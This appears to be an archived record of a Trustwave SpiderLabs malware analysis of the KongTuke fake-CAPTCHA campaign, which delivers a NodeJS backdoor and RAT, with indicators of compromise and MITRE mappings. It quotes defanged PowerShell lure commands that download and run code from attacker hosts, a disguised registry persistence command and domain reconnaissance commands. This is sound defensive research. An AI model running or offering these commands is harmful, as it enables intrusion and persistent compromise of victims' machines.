{
	"id": "89be5e99-f54c-42d4-8076-c5df3aad1040",
	"created_at": "2026-04-06T00:19:06.480589Z",
	"updated_at": "2026-04-12T02:21:10.211543Z",
	"deleted_at": null,
	"sha1_hash": "787bb40322af47f6d9997b0154c131f97aef118c",
	"title": "Yet Another NodeJS Backdoor (YaNB): A Modern Challenge",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3891353,
	"plain_text": "Yet Another NodeJS Backdoor (YaNB): A Modern Challenge\r\nBy Reegun Jayapaul\r\nPublished: 2025-04-29 · Archived: 2026-04-05 17:50:40 UTC\r\nApril 29, 2025 10 Minute Read\r\nDuring an Advanced Continual Threat Hunt (ACTH) investigation conducted in early March 2025, Trustwave\r\nSpiderLabs identified a notable resurgence in malicious campaigns exploiting deceptive CAPTCHA verifications.\r\nThese campaigns trick users into executing NodeJS-based backdoors, subsequently deploying sophisticated\r\nNodeJS Remote Access Trojans (RATs) similar to traditional PE structured legacy RATs.\r\nInitial analysis reveals that the attack begins with executing a malicious NodeJS script, establishing a connection\r\nto the attacker-controlled infrastructure. The malware remains in a passive state awaiting further commands,\r\nwhich facilitates the deployment of additional malicious components. Significantly, our research uncovered the\r\ndeployment of a more advanced NodeJS RAT variant capable of tunneling malicious traffic through SOCKS5\r\nproxies, with communications further secured using XOR-based encryption methods.\r\nMoreover, SpiderLabs has observed a notable increase in similar NodeJS-based backdoor deployments across\r\nmultiple malware campaigns, including KongTuke, Fake CAPTCHA schemes, Mispadu, and Lumma stealers.\r\nGiven the effectiveness and high success rates of fake CAPTCHA techniques as an initial access vector compared\r\nto traditional methods, we anticipate continued growth and prevalence of these tactics.\r\nThese instances are also not the first time the team has investigated the malicious use of CAPTCHA. Earlier\r\nreports include Unveiling the CAPTCHA Escape: The Dance of CAPTCHA Evasion Using TOR, Dissecting a\r\nPhishing Campaign with a CAPTCHA-based URL, and the Resurgence of a Fake Captcha Malware Campaign.\r\nInitial Execution\r\nCompromised Website\r\nThe initial access that the team identified is coming from a compromised website. Victims can reach this site\r\nthrough various means, such as clicking on articles shared via social media posts. By inspecting the source code,\r\nthere is an injected malicious code that loads a JavaScript file.\r\nFigure 1. Malicious injected KongTuke script.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 1 of 22\n\nThis injected code belongs to KongTuke. KongTuke was first mentioned in May 2024. However, it was just one of\r\nthe domains used for redirection from compromised websites to malicious websites for payload delivery.\r\nEventually, the name KongTuke became associated with this set of activities. This cluster of activities was\r\nobserved and monitored by various researchers and was given various names such as 404TDS, Chaya_002,\r\nLandUpdate808, and TAG-124. These are malicious activity clusters that have the same patterns in their attack\r\nchain.\r\nIn different scenarios, the script does not always load the fake CAPTCHA as there is an environment that\r\nmonitors if the user’s environment is compatible with it.\r\nFirst Stage JavaScript File: Injected Script\r\nThe KongTuke campaign has been active since at least September 2024. In earlier versions of the campaign, the\r\ninjected script followed a naming convention that included hardcoded keywords such as “metrics”, “analyzer”,\r\nand “analytics.” However, in November 2024, the latest iteration of KongTuke introduced a new naming\r\nconvention. This aligns with the injected URL and JavaScript naming seen in Figure 1.\r\nFigure 2. KongTuke activities from September 2024 to March 2025.\r\nThe name, which consists of 4 alternating alphabet and numeral characters, is the latest naming convention\r\nobserved to be employed by KongTuke.\r\nRegular Expression for the Injected Script:\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 2 of 22\n\n\\d[a-z]\\d[a-z]\\.js\r\nRegarding the domains used in the injected scripts, it has been observed that most of the domains used belong\r\nto AS 399629 (BLNWX) or BL Networks, US. Aside from BL Networks, other ASN seen were Eonix\r\nCorporation and Cloudflare – albeit only a few coming from them.\r\nTable 1. Observed injected domains.\r\nMoreover, when only accessing the domain, it returns a unique hash resource and shows the words “It works.”\r\nHence, the team was able to identify more domains using this pattern.\r\nThe response, once the injected URL is loaded, is an obfuscated JS file that contains numerous functions. The\r\nfollowing are the highlights of the deobfuscated code:\r\n1. Cookie Checking\r\nThe script checks if the cookie “isCompleted” already exists. If not, it sets this cookie for 4 hours only.\r\nFigure 3. Code for cooking checking.\r\n2. Data Collection\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 3 of 22\n\nThe script gathers the following data in a Base64-encoded format and is sent to the C2:\r\nOperating System\r\nIP Address\r\nCurrent URL (referrer)\r\nBrowser Type\r\nUser-Agent String\r\nGeolocation based on the IP address\r\nFigure 4. Code that is part of the data collection routine.\r\nAs shown in Figure 4, part of the routine is getting the response from the\r\nURL hxxps://www.cloudflare[.]com/cdn-cgi/trace. Through this, the attacker can obtain network and system-related information such as IP addresses and geolocation data.\r\nThe collected data will be sent over to the js.php URL in the following format:\r\nFigure 5. Sending collected data.\r\n3. Loading of Next Stage\r\nIf the response from the C2 is smaller than 35 bytes, it reloads the page. Otherwise, it writes the response\r\ninto the page. This leads to the fake CAPTCHA webpage.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 4 of 22\n\nFigure 6. Preparing for the next stage.\r\nSecond Stage JavaScript File: Fake CAPTCHA\r\nThe succeeding stage leads to the fake CAPTCHA webpage. This social engineering technique, also generally\r\nknown as ClickFix, is prevalent nowadays and has been proven to be effective in deploying malicious payloads\r\ninto systems. The usual theme of the ClickFix lure is either a message prompting users to fix fake errors or to\r\nparticipate in a verification routine.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 5 of 22\n\nFigure 7. Fake CAPTCHA emulation.\r\nAs observed in this incident, there are two versions of PowerShell scripts that are copied to the user’s clipboard\r\nduring this routine.\r\nCopied Command Network C2\r\ncmd /C \"\"PowerShell.exe\" -w h -c \"$u=[int64]\r\n(([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds) -\r\nband 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u | iex\"\"\r\nhxxps://138.199.161[.]141:8080/1741976336\r\n`cmd /c start /min powershell -noprofile -w H -c \"$r=iwr\r\nhxxps://compaq-hr-buyerswhere.trycloudflare[.]com/cloudfla -h @{ 'X-ComputerName'=$env:COMPUTERNAME };$s=\r\n[Text.Encoding]::Utf8.GetString( $r.Content);iex $s\"`;\r\nhxxps://compaq-hr-buyers-where.trycloudflare[.]com/cloudfla\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 6 of 22\n\nTable 2. Commands from the fake CAPTCHA.\r\nVersion 1\r\nThe script encodes a specific date (1970-1-1) in Base64 format and then decodes it. Using this parsed date, the\r\nscript calculates the current UNIX timestamp (seconds since 1970-01-01) and applies a bitwise operation. A\r\nhardcoded IP address is combined with a predefined port to construct a URL path.\r\nFigure 8. Version 1 code snippet with a hardcoded IP address.\r\nVersion 2\r\nThe second version of the script is a malicious JavaScript designed to collect system information and execute\r\nremote PowerShell commands on a victim's machine.\r\nFigure 9. Version 2 code snippet using TryCloudflare URL.\r\nIt first stores the victim's IP address and specifies a remote URL (stat.php). The script then launches PowerShell in\r\na hidden window and retrieves a payload from a TryCloudflare URL. TryCloudflare allows users to create\r\ntemporary tunnels to local servers without requiring a Cloudflare account, making it an effective tool for attackers\r\nto host and deliver malicious content. The script sends the victim’s computer name to the attacker's server.\r\nRegardless of the script version, this results in the deployment of a payload which is a NodeJS RAT.\r\nInitial NodeJS Script\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 7 of 22\n\nThis NodeJS script contains a bunch of functionalities, and at the top are a bunch of anti-VM mechanisms.\r\nIf the system manufacturer is QEMU, the process ends.\r\nIf the memory is less than 4GB or the used memory is less than 1.5GB, it exits.\r\nIf the computer name contains \"DESKTOP-\", it ends.\r\nOnce passing these defense mechanisms, it downloads a Node.js Windows 64-bit package from this URL:\r\nhttps://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip\r\nThis downloaded package is saved in the %APPDATA% directory and its contents are extracted. This will be\r\nused in the execution of the payload, which is a Node.js-based backdoor.\r\nDissecting a Node.js-Based Backdoor\r\nDetach and Execute as Background: To avoid parent process termination, such leads to backdoor to terminate.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 8 of 22\n\nFigure 10. Detach and execute.\r\nCollect System Information: The initial reconnaissance activity is to gather system information from a series of\r\ncommands via powershell.exe or cmd.exe and obtain operating system (OS) details, running and installed\r\nservices, mounted drives, and ARP cache.\r\nFigure 11. System information collection.\r\nData Transmission via XOR Encryption: The gathered data will be transmitted by generating a random 4-byte\r\nbyteKey, XORing the data with byteKey concatenates XOR’d data, byteKey, encKey, and compressing with gzip,\r\nand finally appending zlibKey at the end. The zlibKey is a checksum of the data sent.\r\nData Structure: [gzip (XOR_encrypted_data + random_byteKey + encKey)] + zlibKey\r\nPersistence Installation: Gathers the current process commandline, which is node.exe. Extracts the NodeJS script\r\nfrom the commandline node.exe -e “malicious script”, writes the script to disk as .log file, and creates a registry\r\npersistence with a fake browser updater string.\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"ChromeUpdater\" /t REG_SZ /d\r\n\"script_path\u003e\" /f\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 9 of 22\n\nFigure 12. Function atst, persistence installation.\r\nCommand and Control Listener: Prepares the host to connect to the C2 server and actively listens for\r\ninstructions from the attacker. The data is transferred with the above custom encryption mechanism: [gzip\r\n(XOR_encrypted_data + random_byteKey + encKey)] + zlibKey\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 10 of 22\n\nFigure 13. C2 listener.\r\nC2 Actions: Once the C2 connection is initiated to the server, the host is listening and waiting for incoming\r\ncommands from the attacker. The instruction supports persistence registration, command execution, payload\r\ndropping, and the clearing of traces.\r\nTable 3. Command and actions.\r\nBackdoor Connection Logic: It sends an HTTP request, receives the response, and processes it. During our\r\ninvestigation, we have found that the attacker dropped a NodeJS-based JS RAT and executed via node.exe -e\r\n“dropped JS”.\r\nSend an HTTP request with certain options.\r\nCollect the response in chunks until it ends.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 11 of 22\n\nFigure 14. Backdoor connection logic.\r\nCheck:\r\nIf statusCode is 502, reject (\"fail connect\").\r\nIf statusCode != 200, resolve without processing.\r\nIf the response is exactly 4 bytes and equals \"ooff\", terminate the process.\r\nIf the response is exactly 4 bytes and equals \"atst\", call atst(), then resolve.\r\nOtherwise, split off the last 4 bytes of the response as a key, then XOR-decrypt the main part (decBuf).\r\nThe final byte of decBuf indicates the file type (EXE, DLL, JS, CMD, or default), so the script knows how\r\nto handle it (e.g., write .exe to disk and execute).\r\n0 =\u003e EXE\r\n1 =\u003e DLL\r\n2 =\u003e JS\r\n3 =\u003e CMD\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 12 of 22\n\nFigure 15. Additional payload handler.\r\nPost-Infection\r\nDuring our investigation, we found that the above NodeJS backdoor will be listened to on C2 159[.]69[.]3[.]151\r\nfor the adversary interaction with the host. The adversary dropped another JS file and executed via NodeJS via\r\nnode.exe -e \"SCRIPT\". The JS script which, was dropped in post-infection, is designed as a multi-functional\r\nbackdoor capable of detailed system reconnaissance, executing remote commands, tunneling network traffic\r\n(Socks5 proxy), and maintaining covert, persistent access.\r\nDissecting a Node.js-Based RAT\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 13 of 22\n\nSystem Information Reconnaissance: The script starts with collecting system information including the version\r\nof Windows OS of the current user context and send to the server as JSON format.\r\nFigure 16. Initial system reconnaissance – Client side\r\nFigure 17. Initial system reconnaissance – Server side.\r\nRAT Commands: The TypeMsg commands defined in the script are essentially instruction types or command\r\nidentifiers used by the malware to interpret and execute actions provided by the attacker. These commands are\r\nused for communication between the attacker (C2 server) and the compromised machine.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 14 of 22\n\nTable 4. RAT commands and actions.\r\nSOCKS5 Proxy: The Socks5Thread class is used to establish a covert communication channel. The NodeJS RAT\r\ncreates SOCKS5 proxy tunnels and allows attackers to proxy their traffic.\r\nMaintains Persistence: The CmdThread class maintains an interactive command shell cmd.exe to capture output\r\nand send it to the attacker. It also receives commands from the attacker for further exploitation.\r\nFigure 18. Maintains persistence.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 15 of 22\n\nOne-Off Command Execution: The CmdOneLineThread is used to execute one-off system commands that are\r\nreceived from the attacker and write the output to a randomly named log file. The shell reads the output file and\r\nsends the contents back to the attacker, then immediately deletes the log file.\r\nFigure 19. One-Off Command Execution.\r\nCommand and Control Servers: The NodeJS RAT script has embedded C2s, where the data transmission and\r\ninteraction by the attacker is carried on.\r\nFigure 20. Embedded RAT C2s.\r\nAdditional reconnaissance command: During the interval of the RAT session, the attacker also executed an\r\nadditional reconnaissance command. The command serves as a reconnaissance tool designed to determine whether\r\na Windows system is domain-joined. If the system is domain-joined, it collects detailed information about the\r\nActive Directory (AD) environment, including the number of computer objects, domain trusts, domain controllers,\r\nand Service Principal Names (SPNs). If the system is not part of a domain, it gathers local user group details,\r\nincluding memberships and privileges. This information can be used to identify potential targets, vulnerabilities,\r\nor paths for lateral movement within the network.\r\nFigure 21. Additional post-infection commands.\r\nBreakdown of Commands\r\nCheck Domain Membership\r\n$isDomainJoined = (Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain;\r\nEnumerate AD\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 16 of 22\n\n$domainInfo = 'AD: ' + (New-Object System.DirectoryServices.DirectorySearcher\r\n'(ObjectClass=computer)').FindAll().Count;\r\nEnumerate Domain Trust\r\nnltest /domain_trusts\r\nList Domain Controllers\r\nnltest /dclist:\r\nEnumerate Service Principal Names (SPNs)\r\nnltest /domain_trusts\r\nIf the host is not joined with domains\r\nLists local user groups and their members:\r\nGet-LocalGroup\r\nGet-LocalGroupMember\r\nRAT Simulation\r\nThe RAT polls the server every five minutes for incoming responses. As noted earlier, if the server sends the\r\n“ooff” command, the backdoor terminates immediately; if the “atst” command is received, the RAT executes the\r\ncorresponding “atst” function and logs all activity to the path %APPDATA%[a-z0-9]{8}[a-z0-9]{8}.log.\r\nDuring our investigation, we discovered that the attacker deployed an additional Node.js-based JavaScript\r\nbackdoor with RAT capabilities, though no PE files were dropped at that stage. At SpiderLabs, we replicated the\r\nRAT server to deliver a PE payload, allowing us to analyze its functionality and behavior. Once the backdoor\r\nestablishes a connection to the server, any commands that the attacker issues are forwarded to the infected client.\r\nThe client receives the response; if it is not “ooff” or “atst,” the RAT extracts the final four bytes as a key and\r\napplies an XOR decryption to the main data.\r\nIf the attacker transmits an EXE file, the response structure consists of encrypted data (decBuf) + 4-byte decKey,\r\nafter XOR decryption with decKey, the data structure is file bytes + file type of 1 byte. If the last 1 byte is 0, the\r\nfile is written to disk as a .exe file and executes. The EXE is then saved and executed from %APPDATA%[a-z0-9]\r\n{8}[a-z0-9]{8}.exe, as implemented by the RAT client. We modified the RAT client to better understand its\r\ninternal mechanisms and created a RAT server capable of sending and running PE files when a client connects. A\r\ndetailed walkthrough of the RAT’s logic and behavior is included in the accompanying video.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 17 of 22\n\nFigure 22. Connection termination when the ooff command is received.\r\nAppendix:\r\nMonitoring Opportunities:\r\nInjected JavaScript:\r\nREGEX:  hxxp:// //\\d[a-z]\\d[a-z]\\.js\r\nData Collection Stage\r\nhxxps:// /js.php?device= \u0026ip= \u0026refferer= \u0026browser= \u0026ua= \u0026domain= \u0026is_ajax=1\r\nIndicators of Compromise (IOCs)\r\nInjected JavaScript:\r\nhxxps://inteklabs[.]com/2g6n[.]js\r\nhxxps://ronsamuel[.]com/4r4r[.]js\r\nhxxps://compralibri[.]com/1q2w[.]js\r\nhxxps://wccdefense[.]com/3e5t[.]js\r\nhxxps://pdmfg[.]com/1q2w[.]js\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 18 of 22\n\nhxxps://kkmic[.]com/4e6t[.]js\r\nhxxps://kkmic[.]com/1q2w[.]js\r\nhxxps://loycos[.]com/6a9k[.]js\r\nhxxps://computertecs[.]com/3h7k[.]js\r\nhxxps://loycos[.]com/1q2w[.]js\r\nhxxps://vfclan[.]com/1q2w[.]js\r\nhxxps://vfclan[.]com/4q5t[.]js\r\nhxxps://janhugo[.]com/5s1j[.]js\r\nhxxps://janhugo[.]com/1q2w[.]js\r\nhxxps://tecnogrup[.]com/1q2w[.]js\r\nhxxps://tecnogrup[.]com/4q7u[.]js\r\nhxxps://kimjohan[.]com/5r1w[.]js\r\nhxxps://kimjohan[.]com/1q2w[.]js\r\nhxxps://opteme[.]com/1q2w[.]js\r\nhxxps://opteme[.]com/4r6t[.]js\r\nhxxps://vononline[.]com/3e4r[.]js\r\nhxxps://paulsss[.]com/1q2w[.]js\r\nhxxps://paulsss[.]com/3w6y[.]js\r\nhxxps://samaxwell[.]com/1q2w[.]js\r\nhxxps://cyberetc[.]com/4e7y[.]js\r\nhxxps://srpkoa[.]com/4e6t[.]js\r\nhxxps://samaxwell[.]com/5r4r[.]js\r\nhxxps://mallternet[.]com/6t5t[.]js\r\nhxxps://willchar[.]com/6t1w[.]js\r\nhxxps://harmarpets[.]com/4w8u[.]js\r\nhxxps://rimstarintl[.]com/5r3w[.]js\r\nhxxps://wqenpene[.]com/5r1r[.]js\r\nhxxps://netsolut[.]com/6t3e[.]js\r\nhxxps://unclezekes[.]com/6t4r[.]js\r\nhxxps://debolts[.]com/3w6y[.]js\r\nhxxps://sunotels[.]com/4r6y[.]js\r\nhxxps://fnbsuffield[.]com/6t7y[.]js\r\nhxxps://remaxnoc[.]com/5q7w[.]js\r\nhxxps://onlinelas[.]com/5q8u[.]js\r\nhxxps://szshenyao[.]com/5q3e[.]js\r\nhxxps://vessweb[.]com/6t4e[.]js\r\nhxxps://scanpaq[.]com/6t5t[.]js\r\nhxxps://pirahnas[.]com/6t4q[.]js\r\nhxxps://iconcss[.]com/4w2r[.]js\r\nhxxps://agretex[.]com/5t1r[.]js\r\nhxxps://telback[.]com/5t5y[.]js\r\nhxxps://divexpo[.]com/7y6t[.]js\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 19 of 22\n\nhxxps://lifewis[.]com/3w1q[.]js\r\nhxxps://aecint[.]com/6g1h[.]js\r\nhxxps://idioinc[.]com/5t4a[.]js\r\nhxxps://ppdpharmaco[.]com/5k5g[.]js\r\nhxxps://akmcons[.]com/6d2k[.]js\r\nhxxps://sesraw[.]com/5a2w[.]js\r\nhxxps://opticna[.]com/4e1w[.]js\r\nhxxps://sinobz[.]com/6g5f[.]js\r\nhxxps://sinobz[.]com/2l9j[.]js\r\nhxxps://rystrom[.]com/1b6d[.]js\r\nhxxps://vglweb[.]com/6r9i[.]js\r\nhxxps://zxcaem[.]com/6f1d[.]js\r\nhxxps://saytunka[.]com/3e2w[.]js\r\nhxxps://prpages[.]com/4e2e[.]js\r\nhxxps://glccf[.]com/5o8u[.]js\r\nhxxps://exodvs[.]com/4e1q[.]js\r\nhxxps://pursyst[.]com/8k4r[.]js\r\nhxxps://ecrut[.]com/5r8k[.]js\r\nhxxps://usbkits[.]com/0o9o[.]js\r\nhxxps://ambiwa[.]com/5o0e[.]js\r\nhxxps://boneyn[.]com/7y6y[.]js\r\nhxxps://satpr[.]com/7y6y[.]js\r\nVersion 1\r\nhxxp://138.199[.]161.141:8080\r\nhxxp://64.94.84[.]217:8080\r\nVersion 2\r\nhxxps://lack-behind-came-verification.trycloudflare[.]com/cloudfla\r\nhxxps://rwanda-ventures-soil-trains.trycloudflare[.]com/cloudfla\r\nhxxps://rebecca-nylon-invention-ii.trycloudflare[.]com/cloudfll\r\nMITRE Hunt Package\r\nTA0001 – Initial Access\r\nT1659 – Content Injection\r\nTA0002 - Execution\r\nT1059 - Command and Scripting Interpreter\r\nT1059.001 - PowerShell\r\nT1059.003 - Windows Command Shell\r\nT1059.007 - JavaScript\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 20 of 22\n\nTA0003 - Persistence\r\nT1543 - Create or Modify System Process\r\nT1543.003 - Windows Service\r\nT1053 - Scheduled Task/Job\r\nT1053.005 - Scheduled Task\r\nTA0004 - Privilege Escalation\r\nT1068 - Exploitation for Privilege Escalation\r\nTA0005 - Defense Evasion\r\nT1564 - Hide Artifacts\r\nT1564.003 - Hidden Window\r\nT1036 - Masquerading\r\nT1036.005 - Match Legitimate Name or Location\r\nT1070 - Indicator Removal on Host\r\nT1070.004 - File Deletion\r\nT1497 - Virtualization/Sandbox Evasion\r\nT1497.001 - System Checks\r\nTA0007 - Discovery\r\nT1082 - System Information Discovery\r\nT1057 - Process Discovery\r\nT1049 - System Network Connections Discovery\r\nT1083 - File and Directory Discovery\r\nT1518 - Software Discovery\r\nT1016 - System Network Configuration Discovery\r\nT1033 - System Owner/User Discovery\r\nT1069 - Permission Groups Discovery\r\nTA0011 - Command and Control\r\nT1071 - Application Layer Protocol\r\nT1071.001 - Web Protocols (HTTP/S)\r\nT1573 - Encrypted Channel\r\nT1095 - Non-Application Layer Protocol\r\nT1105 - Ingress Tool Transfer\r\nT1041 - Exfiltration Over C2 Channel\r\nTrustwave's recent revamp of its Advanced Continual Threat Hunt (ACTH) with a new patent-pending\r\nmethodology enables Trustwave to conduct threat hunts and monitor our customers as this campaign continues.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 21 of 22\n\nTrustwave offers ACTH as an option in Trustwave's Managed Detection and Response Services. For more\r\ninformation, please read Trustwave Revamps Continual Threat Hunting Enabling Significantly More Hunts and\r\nUnique Threat Findings.\r\nSource: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/"
	],
	"report_names": [
		"yet-another-nodejs-backdoor-yanb-a-modern-challenge"
	],
	"threat_actors": [
		{
			"id": "4390d8ec-605d-493a-81ee-d5ef80c07046",
			"created_at": "2025-05-29T02:00:03.223467Z",
			"updated_at": "2026-04-12T02:00:03.916957Z",
			"deleted_at": null,
			"main_name": "TAG-124",
			"aliases": [
				"LandUpdate808"
			],
			"source_name": "MISPGALAXY:TAG-124",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775960470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/787bb40322af47f6d9997b0154c131f97aef118c.pdf",
		"text": "https://archive.orkl.eu/787bb40322af47f6d9997b0154c131f97aef118c.txt",
		"img": "https://archive.orkl.eu/787bb40322af47f6d9997b0154c131f97aef118c.jpg"
	}
}